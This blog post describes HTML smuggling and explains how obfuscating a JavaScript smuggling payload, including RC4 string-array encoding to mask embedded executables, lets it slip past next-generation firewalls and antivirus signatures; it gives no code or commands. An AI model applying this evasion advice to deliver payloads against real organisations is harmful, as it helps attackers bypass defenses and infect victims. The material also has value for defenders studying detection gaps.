Creating Fully Undetectable JavaScript Payloads to Evade Next-Generation Firewalls

by Prapattimynk, Wednesday, 16 August 2023 (7 months ago)
Creating Fully Undetectable JavaScript Payloads to Evade Next-Generation Firewalls

In today’s short blog post, we will be covering how to make any JavaScript payload fully undetectable!

This works great for evading detection of any offensive security tool you can find on GitHub that outputs JavaScript.

File introspection with the goal of blocking/detecting EXEs, scripts, and other downloads is a common feature of next-generation firewalls (NGFW) prevalently deployed by enterprises. To get around this security measure, attackers commonly deploy a technique known as HTML smuggling. It works by hiding a malicious file in JavaScript which is downloaded by the target and then decoded into the final payload. As usual, the target will simply see a file is being downloaded and will be none the wiser to the sneaky way in which we delivered it!

Image courtesy Microsoft Threat Intelligence.

Email attachments from sources external to an organization are often stripped. Hence why a website, with a link in the email, is usually used to deliver a payload in the first place. Most large email providers like Gmail or Outlook also always strip attachments with troubling extensions.

Naturally, defenders created signatures for these HTML smuggling JavaScript tools so they could be detected over the network (as opposed to the final payloads themselves):

Above are the detections of one such HTML smuggling project: EmbedInHTML. In practice, a NGFW’s detection for this type of payload would be much higher. The antiviruses on VirusTotal aren’t as geared towards detecting this type of threat. Even still, we have lots of unwanted detections.

So, the defenders made a move. Now it’s the attacker’s turn: How do we become fully undetectable (at least… for now)?

Simple, just paste your payload into then click the “Obfuscate” button!

Pro tip: If you’re HTML smuggling a binary file (like an EXE or DLL) then definitely make sure to select the RC4 encryption option under String Array Encoding. This is necessary to remove any last bits of data that NGFWs might use to signal on. Detecting the structure of any executable file (with its MZ magic number and other PE/COFF structures) within JavaScript is a very strong heuristic and NGFWs will not like it if they see that…

One might think that obfuscating JavaScript in this way would be a huge red flag to NGFWs and other detection software. This would be true in almost any other case like with extensive PowerShell obfuscation or packers for binaries (e.g. antiviruses tend to hate the UPX packer). However, in the world of JavaScript it’s very normal to see heavily minified and sometimes obfuscated scripts to keep file sizes as low as possible for the web and possibly to protect proprietary code. This makes blending in with the vast quantities of those already existing legitimate scripts a very successful strategy.

Information alert
This information is provided for the purposes of legitimate pentesting, education, and further security research only. Please use it responsibly.
Information alert
Detection software (such as antivirus, endpoint detection and response, and next-generation firewalls) should only be used as part of a more holisitc defense-in-depth security strategy. This is mostly due to the fact that security through detection is a cat-and-mouse game. If ‘real’ security is what you want then have a look at my binary exploitation or Qubes OS content (upcoming).


Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.